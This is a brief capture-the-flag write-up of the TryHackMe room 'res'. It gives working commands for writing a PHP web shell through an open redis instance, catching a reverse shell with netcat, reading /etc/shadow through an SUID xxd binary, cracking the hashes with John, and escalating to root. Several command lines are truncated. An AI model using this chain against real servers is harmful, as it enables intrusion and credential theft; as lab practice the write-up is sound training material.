Skip to content


These notes are from a challenge I did @tryhackme called res.

Flag 1

Scanning the environment we find an apache webserver and a redis database...

sudo nmap -sC -sV -sS -p-

When connecting to redis we can set write a file to the main apache dir and create a simple php reverse shell:

redis-cli -h
>config set dir /var/www/html
>config set dbfilename shell.php
>set test "<?php system($_GET['cmd']);?>"

Before we visit our new page we should open a netcat session:

nc -nvlp 666

Time to run our shell.php :) 667 -e /bin/sh

Once we are succesfully connected we can stabilize the shell and view the first flag:

python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /home/vianka/user.txt

Flag 2

Lets have a look at the passwd

cat /etc/passwd

There is SUID bit set for xxd. To access the shadow file can use this trick.

xxd "$LFILE" | xxd -r

Time to crack the password:

unshadow passwd.txt shadow.txt > hash.txt
john hash.txt

Once we have the password we can escalate our priviledges to vianka which somehow also has root access.

su vianka
sudo su
cat /root/root.txt